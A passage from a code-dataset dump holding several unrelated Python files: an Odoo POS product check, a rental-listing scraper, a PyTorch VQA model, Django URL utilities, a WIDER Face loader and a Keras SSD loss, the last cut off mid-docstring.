post\")\n","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"593433073","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2016-Today: La Louve ()\n# @author: La Louve\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\nfrom openerp import fields, models, api, _\nfrom openerp.exceptions import Warning\n\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n @api.multi\n def write(self, vals):\n if 'available_in_pos' in vals and not vals['available_in_pos']:\n self.check_pos_session_running()\n return super(ProductTemplate, self).write(vals)\n\n @api.multi\n def check_pos_session_running(self):\n pos_sessions = self.env['pos.session'].search(\n [('state', 'in', ['opening_control', 'opened'])])\n if pos_sessions:\n raise Warning(_(\n 'You cannot unticking Available in the Point of Sale '\n 'When POS Session are running with ids %s') % pos_sessions.ids)\n return True\n","sub_path":"intercoop_addons/coop_point_of_sale/models/product_template.py","file_name":"product_template.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"468051182","text":"__author__ = 'speky'\n\nimport requests\nimport bs4\nimport operator\nimport base\n\n\nclass IngatlanBazarSearch(base.BaseSearch):\n\n def __init__(self):\n base.BaseSearch.__init__(self)\n self.root_url = 'http://ingatlanbazar.hu/'\n self.index_url = self.root_url + '/HU/ingatlan-'\n self.districts = {'I':202, 'II':197, 'III': 213, 'IV':199, 'V':208, 'VI':212, 'VII':217, 'VIII':214, 'IX':216, 'X':204,\n 'XI':209, 'XII':205, 'XIII':210, 'XIV':211, 'XV':206,'XVI':201, 'XVII':196, 'XVIII':245, 'XIX':198, 'XX':200,\n 'XXI':207, 'XXII':203, 'XXIII':218}\n\n def set_params(self, min_cost, max_cost, min_size, max_size, dog, furniture, district):\n self.url = self.index_url\n self.url += '+'+self.__set_district(district)\n if furniture == 1:\n self.url += self.furniture_string\n # self.url += \"+\"+str(min_size)+\"-\"+str(max_size)+\"-m2\"\n self.url += self.cost_string+str(min_cost)+\"-\"+str(max_cost)+\"-ezer-Ft\"\n print(self.url)\n\n def get_urls(self):\n _lastPage = int(self.__get_max_page_number())\n print(\"lastpage: \"+str(_lastPage))\n for pageNumber in range(1, _lastPage + 1):\n # print (\"pageNumber: \" + str(pageNumber))\n self.__get_page_urls(pageNumber)\n return self.numberOflinks\n\n def __get_max_page_number(self):\n _response = requests.get(self.url)\n # fix if bug in the response html\n text = _response.text.replace(\"!–[\", \"!--[\")\n _soup = bs4.BeautifulSoup(text)\n _max = _soup.find('li', attrs={'class': 'numbers'})\n if _max == None:\n return 0\n _maxTxt = _max.text\n _maxTxt = _maxTxt.replace('\\n', '')\n # get max page number\n _pageNum = _maxTxt.split()[-1]\n #truncate '-bol' string from the end of it\n return _pageNum[:-4]\n\n def __get_page_urls(self, pageNum):\n _response = requests.get(self.url+\"?page=\"+str(pageNum))\n # fix if bug in the response html\n _text = _response.text.replace(\"!–[\", \"!--[\")\n _soup = bs4.BeautifulSoup(_text)\n # find the rent box div\n _divs = _soup.find_all('tr', attrs={'class': 'list-row'})\n for div in _divs:\n self.numberOflinks += 1\n link = self.__get_link(div)\n street = self.__get_address(div)\n price = self.__get_price(div)\n size = self.__get_area_size(div)\n self.rentHouses[link] = {'address': street, 'price': 
price, 'size': size, 'distance': 0}\n\n def __set_district(self, district):\n if len(district) == 0:\n return \"Magyarorszag-Lakas-Kiado-8-10-2\"\n _result = \"Magyarorszag-Lakas-Kiado-8-10-\"\n for num in district.split('+'):\n id = num\n id = str(id).upper()\n _result += str(self.districts[id]) + ','\n _result = _result[:-1]\n print(_result)\n return _result\n\n def __get_link(self, div):\n address = div.find('td', attrs={'class': 'thumbnail'})\n _link = address.find('a')['href']\n if _link.startswith('/'):\n return self.root_url + _link\n return _link\n\n def __get_address(self, div):\n _section = div.find('td', attrs={'class': 'address'})\n _district = _section.text\n _address = _district.replace('\\n', '').strip()\n return _address\n\n def __get_area_size(self, div):\n _results = div.find_all('td', attrs={'class': 'centered'})\n _size = _results[1].text\n _size = ''.join(_size.split())\n # remove m2 string from the end\n return _size[:-2]\n\n def __get_price(self, div):\n _price = div.find('td', attrs={'class': 'centered'})\n _price = _price.text\n _price = ''.join(_price.split())\n return _price[:-5]\n","sub_path":"renthouse/ingatlanbazar.py","file_name":"ingatlanbazar.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"35592615","text":"import torch\r\nimport torch.nn as nn\r\n\r\nimport torch.nn.functional as F\r\n\r\nWORD_EMBED_SIZE = 300\r\nNUM_LSTM_LAYERS = 2\r\nHIDDEN_LSTM_SIZE = 512\r\nIMAGE_FEATURES = 2048\r\nMID_FEATURES = 1024\r\nA_MID_FEATURES = 512\r\nDROPOUT = 0.5\r\nGLIMPSES = 2\r\nTEXT_FEATURES = NUM_LSTM_LAYERS * HIDDEN_LSTM_SIZE\r\n\r\n\r\nclass TextEncoder(nn.Module):\r\n def __init__(self, input_text_size):\r\n super(TextEncoder, self).__init__()\r\n self.embedding = nn.Embedding(input_text_size, WORD_EMBED_SIZE)\r\n self.activation = nn.Tanh()\r\n self.drop = nn.Dropout(DROPOUT)\r\n self.lstm = nn.LSTM(WORD_EMBED_SIZE, HIDDEN_LSTM_SIZE, NUM_LSTM_LAYERS)\r\n nn.init.xavier_uniform_(self.embedding.weight)\r\n for w in self.lstm.weight_ih_l0.chunk(4, 0):\r\n nn.init.xavier_uniform_(w)\r\n for w in self.lstm.weight_hh_l0.chunk(4, 0):\r\n nn.init.xavier_uniform_(w)\r\n self.lstm.bias_ih_l0.data.zero_()\r\n self.lstm.bias_hh_l0.data.zero_()\r\n\r\n def forward(self, question):\r\n qst_vec = self.embedding(question)\r\n qst_vec = self.activation(self.drop(qst_vec))\r\n qst_vec = qst_vec.transpose(0, 1)\r\n _, (hidden, cell) = self.lstm(qst_vec)\r\n qst_feature = cell.transpose(0, 1)\r\n qst_feature = qst_feature.reshape(qst_feature.size()[0], -1)\r\n\r\n return qst_feature\r\n\r\n\r\nclass AttentionModel(nn.Module):\r\n def __init__(self):\r\n super(AttentionModel, self).__init__()\r\n self.image_convolution = nn.Conv2d(IMAGE_FEATURES, A_MID_FEATURES, 1,\r\n bias=False) # let self.lin take care of bias\r\n self.question_linear = nn.Linear(TEXT_FEATURES, A_MID_FEATURES)\r\n self.result_convolution = nn.Conv2d(A_MID_FEATURES, GLIMPSES, 1)\r\n\r\n self.drop = nn.Dropout(DROPOUT)\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n def forward(self, img, qst):\r\n img = self.image_convolution(self.drop(img))\r\n qst = self.question_linear(self.drop(qst))\r\n attention_question = tile_2d_over_nd(qst, img)\r\n result = self.relu(img + attention_question)\r\n result = self.result_convolution(self.drop(result))\r\n return result\r\n\r\n\r\nclass VqaModel(nn.Module):\r\n def __init__(self, input_text_size, output_text_size):\r\n super(VqaModel, self).__init__()\r\n print('Using encoded 
images')\r\n self.question_encoder = TextEncoder(input_text_size)\r\n self.activation = nn.Tanh()\r\n self.attention = AttentionModel()\r\n self.dropout1 = nn.Dropout(DROPOUT)\r\n self.dropout2 = nn.Dropout(DROPOUT)\r\n\r\n self.linear1 = nn.Linear(GLIMPSES * IMAGE_FEATURES + TEXT_FEATURES, TEXT_FEATURES)\r\n self.activation2 = nn.ReLU()\r\n self.linear2 = nn.Linear(TEXT_FEATURES, output_text_size)\r\n\r\n for m in self.modules():\r\n if isinstance(m, nn.Linear):\r\n nn.init.xavier_uniform_(m.weight)\r\n if m.bias is not None:\r\n m.bias.data.zero_()\r\n\r\n def forward(self, img, qst):\r\n l2_norm = img.norm(p=2, dim=1, keepdim=True).detach()\r\n img_ = img.div(l2_norm)\r\n\r\n qst_ = self.question_encoder(qst)\r\n attention = self.attention(img_, qst_)\r\n img_ = apply_attention(img_, attention)\r\n combined = torch.cat([img_, qst_], dim=1)\r\n combined = self.dropout1(combined)\r\n combined = self.linear1(combined)\r\n combined = self.activation2(combined)\r\n\r\n combined = self.dropout2(combined)\r\n combined = self.linear2(combined)\r\n return combined\r\n\r\n\r\ndef tile_2d_over_nd(feature_vector, feature_map):\r\n \"\"\" Repeat the same feature vector over all spatial positions of a given feature map.\r\n The feature vector should have the same batch size and number of features as the feature map.\r\n \"\"\"\r\n n, c = feature_vector.size()\r\n spatial_size = feature_map.dim() - 2\r\n tiled = feature_vector.view(n, c, *([1] * spatial_size)).expand_as(feature_map)\r\n return tiled\r\n\r\n\r\ndef apply_attention(input, attention):\r\n \"\"\" Apply any number of attention maps over the input. \"\"\"\r\n n, c = input.size()[:2]\r\n glimpses = attention.size(1)\r\n\r\n # flatten the spatial dims into the third dim, since we don't need to care about how they are arranged\r\n input = input.view(n, 1, c, -1) # [n, 1, c, s]\r\n attention = attention.view(n, glimpses, -1)\r\n attention = F.softmax(attention, dim=-1).unsqueeze(2) # [n, g, 1, s]\r\n weighted = attention * input # [n, g, v, s]\r\n weighted_mean = weighted.sum(dim=-1) # [n, g, v]\r\n return weighted_mean.view(n, -1)\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"66995335","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: d:\\Dropbox\\vk\\django-url-methods\\urlmethods\\urlmethods.py\n# Compiled at: 2014-04-29 04:58:50\n\"\"\"\nhttp://www.ietf.org/rfc/rfc2396.txt\n\"\"\"\nimport re\nfrom threadmethod import threadmethod\nSPLIT_RE = re.compile('^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\\\\?([^#]*))?(#(.*))?')\n\ndef urlsplit(url):\n \"\"\"\n Split given ``url`` to the tuple\n (scheme, authority, path, query, fragment).\n \n >>> urlsplit('http://www.ics.uci.edu/pub/ietf/uri/?arg1=value1&arg2=value2#Related')\n ('http', 'www.ics.uci.edu', '/pub/ietf/uri/', 'arg1=value1&arg2=value2', 'Related')\n \n >>> urlsplit('http://www.ics.uci.edu')\n ('http', 'www.ics.uci.edu', '', None, None)\n \n >>> urlsplit('http://www.ics.uci.edu/')\n ('http', 'www.ics.uci.edu', '/', None, None)\n \n >>> urlsplit('http:/www.ics.uci.edu/')\n ('http', None, '/www.ics.uci.edu/', None, None)\n \n >>> urlsplit('http:www.ics.uci.edu/')\n ('http', None, 'www.ics.uci.edu/', None, None)\n \n >>> urlsplit('http/://www.ics.uci.edu/')\n (None, None, 'http/://www.ics.uci.edu/', None, None)\n\n >>> 
urlsplit('/img.png')\n (None, None, '/img.png', None, None)\n \n >>> urlsplit('')\n (None, None, '', None, None)\n \"\"\"\n match = SPLIT_RE.match(url)\n return (match.group(2), match.group(4), match.group(5), match.group(7), match.group(9))\n\n\ndef urljoin(scheme, authority, path, query, fragment):\n \"\"\"\n Join url from given\n ``scheme``, ``authority``, ``path``, ``query``, ``fragment``.\n\n >>> url = 'http://www.ics.uci.edu/pub/ietf/uri/?arg1=value1&arg2=value2#Related'\n >>> urljoin(*urlsplit(url)) == url\n True\n\n >>> url = '/img.png'\n >>> urljoin(*urlsplit(url)) == url\n True\n\n >>> url = ''\n >>> urljoin(*urlsplit(url)) == url\n True\n \"\"\"\n result = ''\n if scheme is not None:\n result += scheme + ':'\n if authority is not None:\n result += '//' + authority\n if path is not None:\n result += path\n if query is not None:\n result += '?' + query\n if fragment is not None:\n result += '#' + fragment\n return result\n\n\nURL_FIX_RE = re.compile('%(?![0-9A-Fa-f]{2})')\nURL_FIX_RELP = '%25'\n\ndef urlfix(url):\n \"\"\"\n Fix quotes in uri.\n \n >>> urlfix('/img.jpg')\n '/img.jpg'\n\n >>> urlfix('/%69mg.jpg')\n '/%69mg.jpg'\n\n >>> urlfix('/%mg.jpg')\n '/%25mg.jpg'\n \n >>> urlfix('Q%WW%R%1TT%2%YYY%%34UU%a5%6A')\n 'Q%25WW%25R%251TT%252%25YYY%25%34UU%a5%6A'\n \"\"\"\n return URL_FIX_RE.sub(URL_FIX_RELP, url)\n\n\ndef remote_check(url, user_agent='Urlmethos'):\n \"\"\"\n Try to fetch specified ``url``.\n Return True if success.\n \n >>> remote_check('http://example.com')\n True\n\n >>> remote_check('http://example.com/')\n True\n \n >>> remote_check('http://example.com/?ask#anchor')\n True\n \n >>> remote_check('http://example.com/does.not.exist.html')\n False\n \n >>> remote_check('http://does.not.exist')\n False\n\n >>> remote_check('unsupported://example.com')\n False\n\n >>> remote_check('example.com')\n False\n \"\"\"\n import urllib2\n headers = {'Accept': 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', \n 'Accept-Language': 'en-us,en;q=0.5', \n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', \n 'Connection': 'close', \n 'User-Agent': user_agent}\n try:\n req = urllib2.Request(url, None, headers)\n urllib2.urlopen(req)\n except:\n return False\n\n return True\n\n\ndef get_path(base_url, url):\n \"\"\"\n Returns None or path after base url.\n\n >>> get_path('/media/', '/media/foo.bar')\n 'foo.bar'\n\n >>> get_path('/media/', '/media/')\n ''\n\n >>> get_path('/media/', '/media') is None\n True\n\n >>> get_path('/media/', 'media/') is None\n True\n\n >>> get_path('/media/', 'baz') is None\n True\n\n \"\"\"\n regexp = re.compile('^%s(?P.*)$' % re.escape(base_url))\n match = regexp.match(url)\n if not match:\n return None\n else:\n return match.groupdict()['path']\n\n\ndef local_media_response(path, data):\n \"\"\"\n Returns None or media serve response.\n\n >>> local_media_response('/foo/bar', {}) is None\n True\n\n >>> local_media_response('/media/foo', {}).status_code\n 200\n\n >>> local_media_response('/media/does.not.exist', {}).status_code\n 404\n \"\"\"\n from django.conf import settings\n from django.http import Http404, HttpResponseNotFound\n from django.views.static import serve\n from django.test.client import RequestFactory\n media_path = get_path(settings.MEDIA_URL, path)\n if media_path is None:\n return\n else:\n factory = RequestFactory()\n request = factory.get(path, data)\n try:\n return serve(request=request, path=media_path, document_root=settings.MEDIA_ROOT)\n except Http404:\n return 
HttpResponseNotFound()\n\n return\n\n\ndef local_static_response(path, data):\n \"\"\"\n Returns None or static serve response.\n\n >>> local_static_response('/foo/bar', {}) is None\n True\n\n >>> local_static_response('/static/admin/css/base.css', {}).status_code\n 200\n\n >>> local_static_response('/static/does.not.exist', {}).status_code\n 404\n \"\"\"\n from django.conf import settings\n from django.contrib.staticfiles.views import serve\n try:\n from django.contrib.staticfiles.handlers import url2pathname\n except ImportError:\n from urllib import url2pathname\n\n from django.http import Http404, HttpResponseNotFound\n from django.test.client import RequestFactory\n static_path = get_path(settings.STATIC_URL, path)\n if static_path is None:\n return\n else:\n factory = RequestFactory()\n request = factory.get(path, data)\n path_name = url2pathname(static_path)\n try:\n return serve(request=request, path=path_name, insecure=True)\n except Http404:\n return HttpResponseNotFound()\n\n return\n\n\ndef local_response_unthreaded(path, query=None, follow_redirect=10):\n \"\"\"\n Try to fetch specified ``path`` using django.test.Client.\n\n ``query`` is string with query.\n\n ``follow_redirect`` is number of redirects to be followed.\n\n Return response.\n\n You must use threaded version of this function (local_response).\n \"\"\"\n from django.http import QueryDict\n from django.test.client import Client\n client = Client()\n if query:\n data = QueryDict(query)\n else:\n data = {}\n while True:\n response = local_media_response(path, data)\n if response is None:\n response = local_static_response(path, data)\n if response is None:\n response = client.get(path, data)\n if follow_redirect and follow_redirect > 0 and response.status_code in (301,\n 302):\n follow_redirect -= 1\n scheme, authority, path, query, fragment = urlsplit(response['Location'])\n if scheme == 'http' and authority == 'testserver':\n continue\n break\n\n return response\n\n\n@threadmethod()\ndef local_response(path, query=None, follow_redirect=10):\n \"\"\"\n Try to fetch specified ``path`` using django.test.Client.\n\n ``query`` is string with query.\n\n ``follow_redirect`` is number of redirects to be followed.\n\n Return response.\n\n To prevent exceptions when local request will be called from request\n we must run it in separated thread.\n\n >>> local_response('/response').status_code\n 200\n\n >>> local_response('/notfound').status_code\n 404\n\n >>> local_response('/error').status_code\n 500\n\n >>> local_response('/redirect_response').status_code\n 200\n\n >>> local_response('/redirect_notfound').status_code\n 404\n\n >>> local_response('/redirect_redirect_response').status_code\n 200\n\n >>> local_response('/redirect_cicle').status_code\n 302\n\n >>> local_response('/permanent_redirect_response').status_code\n 200\n\n >>> local_response('/http404').status_code\n 404\n\n >>> local_response('/http500')\n Traceback (most recent call last):\n ...\n Exception\n\n >>> local_response('/request_true_response').content\n 'True'\n\n >>> local_response('/request_false_response').content\n 'False'\n\n >>> local_response('/does.not.exist').status_code\n 404\n\n >>> local_response('/media/foo').status_code\n 200\n\n >>> local_response('/media/does.not.exist').status_code\n 404\n\n >>> local_response('/static/admin/css/base.css').status_code\n 200\n\n >>> local_response('/static/does.not.exist').status_code\n 404\n \"\"\"\n return local_response_unthreaded(path, query, follow_redirect)\n\n\ndef local_check(path, query=None, 
follow_redirect=10):\n \"\"\"\n Try to fetch specified ``path`` using django.test.Client.\n ``query`` is string with query.\n Return True if success.\n\n >>> local_check('/response')\n True\n\n >>> local_check('/notfound')\n False\n\n >>> local_check('/error')\n False\n\n >>> local_check('/redirect_response')\n True\n\n >>> local_check('/redirect_notfound')\n False\n\n >>> local_check('/redirect_redirect_response')\n True\n\n >>> local_check('/redirect_cicle')\n False\n\n >>> local_check('/permanent_redirect_response')\n True\n\n >>> local_check('/http404')\n False\n\n >>> local_check('/http500')\n False\n\n >>> local_check('/request_true_response')\n True\n\n >>> local_check('/request_false_response')\n True\n\n >>> local_check('/does.not.exist')\n False\n\n >>> local_check('/media/foo')\n True\n\n >>> local_check('/media/does.not.exist')\n False\n\n >>> local_check('/static/admin/css/base.css')\n True\n\n >>> local_check('/static/does.not.exist')\n False\n \"\"\"\n try:\n response = local_response(path, query, follow_redirect)\n return response.status_code == 200\n except:\n return False","sub_path":"pycfiles/django-url-methods-0.2.0/urlmethods.py","file_name":"urlmethods.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"620436487","text":"import numpy as np\nimport mmcv\nfrom .registry import DATASETS\nfrom .custom import CustomDataset\n@DATASETS.register_module\nclass WIDERFaceDataset(CustomDataset):\n \"\"\"\n Reader for the WIDER Face dataset in PASCAL VOC format.\n Conversion scripts can be found in\n https://github.com/sovrasov/wider-face-pascal-voc-annotations\n \"\"\"\n CLASSES = ('face', )\n\n def __init__(self, min_size=None, **kwargs):\n self.min_size = min_size\n super(WIDERFaceDataset, self).__init__(**kwargs)\n\n def load_annotations(self, ann_file):\n img_info = mmcv.load(ann_file)\n for i, img in enumerate(img_info):\n ann = img['ann']\n gt_bboxes = []\n gt_bboxes_ignore = []\n gt_labels = []\n for box in ann['bboxes']:\n x1, y1, w, h= box\n area = w * h\n bbox = [x1, y1, x1 + w - 1, y1 + h - 1]\n if self.min_size is not None:\n if area < self.min_size:\n gt_bboxes_ignore.append(bbox)\n else:\n gt_labels.append(1)\n gt_bboxes.append(bbox)\n else:\n gt_labels.append(1)\n gt_bboxes.append(bbox)\n\n if gt_bboxes:\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\n gt_labels = np.array(gt_labels, dtype=np.int64)\n else:\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\n gt_labels = np.array([], dtype=np.int64)\n\n if gt_bboxes_ignore:\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\n else:\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\n\n ann = dict(\n bboxes=gt_bboxes, labels=gt_labels, bboxes_ignore=gt_bboxes_ignore)\n img_info[i]['ann'] = ann\n\n\n \n return img_info\n","sub_path":"mmdet/datasets/wider_face.py","file_name":"wider_face.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"71844926","text":"# Code adapted from https://github.com/rykov8/ssd_keras\n\nimport keras.backend as K\nfrom keras.layers import Activation\nfrom keras.layers import Conv2D\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers import GlobalAveragePooling2D\nfrom keras.layers import Input\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Reshape\nfrom keras.layers import ZeroPadding2D\nfrom keras.models import Model as 
KerasModel\nfrom keras.layers import concatenate\nfrom keras.layers import Dropout\nfrom keras.utils import Sequence\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom keras.preprocessing import image\nfrom keras.models import load_model\nfrom keras.optimizers import SGD\n\nfrom keras.engine.topology import InputSpec\nfrom keras.engine.topology import Layer\nimport numpy as np\nimport tensorflow as tf\nimport pickle\nimport os\nimport cv2\nfrom random import shuffle\nfrom xml.etree import ElementTree\n\nimport vectorial.core\n\n\nclass MultiboxLoss(object):\n \"\"\"Multibox loss with some helper functions.\n # Arguments\n num_classes: Number of classes including background.\n alpha: Weight of L1-smooth loss.\n neg_pos_ratio: Max ratio of negative to positive boxes in loss.\n background_label_id: Id of background label.\n negatives_for_hard: Number of negative boxes to consider\n it there is no positive boxes in batch.\n # References\n https://arxiv.org/abs/1512.02325\n # TODO\n Add possibility for background label id be not zero\n \"\"\"\n def __init__(self, num_classes, alpha=1.0, neg_pos_ratio=3.0,\n background_label_id=0, negatives_for_hard=100.0):\n self.num_classes = num_classes\n self.alpha = alpha\n self.neg_pos_ratio = neg_pos_ratio\n if background_label_id != 0:\n raise Exception('Only 0 as background label id is supported')\n self.background_label_id = background_label_id\n self.negatives_for_hard = negatives_for_hard\n\n def _l1_smooth_loss(self, y_true, y_pred):\n \"\"\"Compute L1-smooth loss.\n # Arguments\n y_true: Ground truth bounding boxes,\n tensor of shape (?, num_boxes, 4).\n y_pred: Predicted bounding boxes,\n tensor of shape (?, num_boxes, 4).\n # Returns\n l1_loss: L1-smooth loss, tensor of shape (?, num_boxes).\n # References\n https://arxiv.org/abs/1504.08083\n \"\"\"\n abs_loss = tf.abs(y_true - y_pred)\n sq_loss = 0.5 * (y_true - y_pred)**2\n l1_loss = tf.where(tf.less(abs_loss, 1.0), sq_loss, abs_loss - 0.5)\n return tf.reduce_sum(l1_loss, -1)\n\n def _softmax_loss(self, y_true, y_pred):\n \"\"\"Compute softmax loss.\n # Arguments\n y_true: Ground truth targets,\n tensor of shape (?, num_boxes, num_classes).\n y_pred: Predicted logits,\n tensor of shape (?, num_boxes, num_classes).\n # Returns\n softmax_loss: Softmax loss, tensor of shape (?, num_boxes).\n \"\"\"\n y_pred = tf.maximum(tf.minimum(y_pred, 1 - 1e-15), 1e-15)\n softmax_loss = -tf.reduce_sum(y_true * tf.log(y_pred),\n axis=-1)\n return softmax_loss\n\n def compute_loss(self, y_true, y_pred):\n \"\"\"Compute mutlibox loss.\n # Arguments\n y_true: Ground truth targets,\n tensor of shape (?, num_boxes, 4 + num_classes + 8),\n priors in ground truth are fictitious,\n y_true[:, :, -8] has 1 if prior should be penalized\n or in other words is assigned to some ground truth box,\n y_true[:, :, -7:] are all 0.\n y_pred: Predicted logits,\n tensor of shape (?, num_boxes, 4 + num_classes + 8).\n # Returns\n loss: Loss for prediction, tensor of shape (?,).\n \"\"\"\n batch_size = tf.shape(y_true)[0]\n num_boxes = tf.to_float(tf.shape(y_true)[1])\n\n # loss for all priors\n conf_loss = self._softmax_loss(y_true[:, :, 4:-8],\n y_pred[:, :, 4:-8])\n loc_loss = self._l1_smooth_loss(y_true[:, :, :4],\n y_pred[:, :, :4])\n\n # get positives loss\n num_pos = tf.reduce_sum(y_true[:, :, -8], axis=-1)\n pos_loc_loss = tf.reduce_sum(loc_loss * y_true[:, :, -8],\n axis=1)\n pos_conf_loss = tf.reduce_sum(conf_loss * y_true[:, :, -8],\n axis=1)\n\n # get negatives loss, we penalize only confidence here\n 
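        # Hard negative mining: nearly every prior is background, so rather
        # than summing confidence loss over all unmatched priors, only the
        # highest-confidence false positives are kept -- at most
        # neg_pos_ratio negatives per positive match (with a fixed fallback
        # count when a batch has no positives) -- so that easy negatives do
        # not swamp the loss.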
num_neg = tf.minimum(self.neg_pos_ratio * num_pos,\n num_boxes - num_pos)\n pos_num_neg_mask = tf.greater(num_neg, 0)\n has_min = tf.to_float(tf.reduce_any(pos_num_neg_mask))\n num_neg = tf.concat(axis=0, values=[num_neg,\n [(1 - has_min) * self.negatives_for_hard]])\n num_neg_batch = tf.reduce_min(tf.boolean_mask(num_neg,\n tf.greater(num_neg, 0)))\n num_neg_batch = tf.to_int32(num_neg_batch)\n confs_start = 4 + self.background_label_id + 1\n confs_end = confs_start + self.num_classes - 1\n max_confs = tf.reduce_max(y_pred[:, :, confs_start:confs_end],\n axis=2)\n _, indices = tf.nn.top_k(max_confs * (1 - y_true[:, :, -8]),\n k=num_neg_batch)\n batch_idx = tf.expand_dims(tf.range(0, batch_size), 1)\n batch_idx = tf.tile(batch_idx, (1, num_neg_batch))\n full_indices = (tf.reshape(batch_idx, [-1]) * tf.to_int32(num_boxes) +\n tf.reshape(indices, [-1]))\n # full_indices = tf.concat(2, [tf.expand_dims(batch_idx, 2),\n # tf.expand_dims(indices, 2)])\n # neg_conf_loss = tf.gather_nd(conf_loss, full_indices)\n neg_conf_loss = tf.gather(tf.reshape(conf_loss, [-1]),\n full_indices)\n neg_conf_loss = tf.reshape(neg_conf_loss,\n [batch_size, num_neg_batch])\n neg_conf_loss = tf.reduce_sum(neg_conf_loss, axis=1)\n\n # loss is sum of positives and negatives\n total_loss = pos_conf_loss + neg_conf_loss\n total_loss /= (num_pos + tf.to_float(num_neg_batch))\n num_pos = tf.where(tf.not_equal(num_pos, 0), num_pos,\n tf.ones_like(num_pos))\n total_loss += (self.alpha * pos_loc_loss) / num_pos\n return total_loss\n\nclass BBoxUtility(object):\n \"\"\"Utility class to do some stuff with bounding boxes and priors.\n\n # Arguments\n num_classes: Number of classes including background.\n priors: Priors and variances, numpy tensor of shape (num_priors, 8),\n priors[i] = [xmin, ymin, xmax, ymax, varxc, varyc, varw, varh].\n overlap_threshold: Threshold to assign box to a prior.\n nms_thresh: Nms threshold.\n top_k: Number of total bboxes to be kept per image after nms step.\n\n # References\n https://arxiv.org/abs/1512.02325\n \"\"\"\n # TODO add setter methods for nms_thresh and top_K\n def __init__(self, num_classes, priors=None, overlap_threshold=0.5,\n nms_thresh=0.45, top_k=400):\n self.num_classes = num_classes\n self.priors = priors\n self.num_priors = 0 if priors is None else len(priors)\n self.overlap_threshold = overlap_threshold\n self._nms_thresh = nms_thresh\n self._top_k = top_k\n self.boxes = tf.placeholder(dtype='float32', shape=(None, 4))\n self.scores = tf.placeholder(dtype='float32', shape=(None,))\n self.nms = tf.image.non_max_suppression(self.boxes, self.scores,\n self._top_k,\n iou_threshold=self._nms_thresh)\n self.sess = tf.Session(config=tf.ConfigProto(device_count={'GPU': 0}))\n\n @property\n def nms_thresh(self):\n return self._nms_thresh\n\n @nms_thresh.setter\n def nms_thresh(self, value):\n self._nms_thresh = value\n self.nms = tf.image.non_max_suppression(self.boxes, self.scores,\n self._top_k,\n iou_threshold=self._nms_thresh)\n\n @property\n def top_k(self):\n return self._top_k\n\n @top_k.setter\n def top_k(self, value):\n self._top_k = value\n self.nms = tf.image.non_max_suppression(self.boxes, self.scores,\n self._top_k,\n iou_threshold=self._nms_thresh)\n\n def iou(self, box):\n \"\"\"Compute intersection over union for the box with all priors.\n\n # Arguments\n box: Box, numpy tensor of shape (4,).\n\n # Return\n iou: Intersection over union,\n numpy tensor of shape (num_priors).\n \"\"\"\n # compute intersection\n inter_upleft = np.maximum(self.priors[:, :2], box[:2])\n 
inter_botright = np.minimum(self.priors[:, 2:4], box[2:])\n inter_wh = inter_botright - inter_upleft\n inter_wh = np.maximum(inter_wh, 0)\n inter = inter_wh[:, 0] * inter_wh[:, 1]\n # compute union\n area_pred = (box[2] - box[0]) * (box[3] - box[1])\n area_gt = (self.priors[:, 2] - self.priors[:, 0])\n area_gt *= (self.priors[:, 3] - self.priors[:, 1])\n union = area_pred + area_gt - inter\n # compute iou\n iou = inter / union\n return iou\n\n def encode_box(self, box, return_iou=True):\n \"\"\"Encode box for training, do it only for assigned priors.\n\n # Arguments\n box: Box, numpy tensor of shape (4,).\n return_iou: Whether to concat iou to encoded values.\n\n # Return\n encoded_box: Tensor with encoded box\n numpy tensor of shape (num_priors, 4 + int(return_iou)).\n \"\"\"\n iou = self.iou(box)\n encoded_box = np.zeros((self.num_priors, 4 + return_iou))\n assign_mask = iou > self.overlap_threshold\n if not assign_mask.any():\n assign_mask[iou.argmax()] = True\n if return_iou:\n encoded_box[:, -1][assign_mask] = iou[assign_mask]\n assigned_priors = self.priors[assign_mask]\n box_center = 0.5 * (box[:2] + box[2:])\n box_wh = box[2:] - box[:2]\n assigned_priors_center = 0.5 * (assigned_priors[:, :2] +\n assigned_priors[:, 2:4])\n assigned_priors_wh = (assigned_priors[:, 2:4] -\n assigned_priors[:, :2])\n # we encode variance\n encoded_box[:, :2][assign_mask] = box_center - assigned_priors_center\n encoded_box[:, :2][assign_mask] /= assigned_priors_wh\n encoded_box[:, :2][assign_mask] /= assigned_priors[:, -4:-2]\n encoded_box[:, 2:4][assign_mask] = np.log(box_wh /\n assigned_priors_wh)\n encoded_box[:, 2:4][assign_mask] /= assigned_priors[:, -2:]\n return encoded_box.ravel()\n\n def assign_boxes(self, boxes):\n \"\"\"Assign boxes to priors for training.\n\n # Arguments\n boxes: Box, numpy tensor of shape (num_boxes, 4 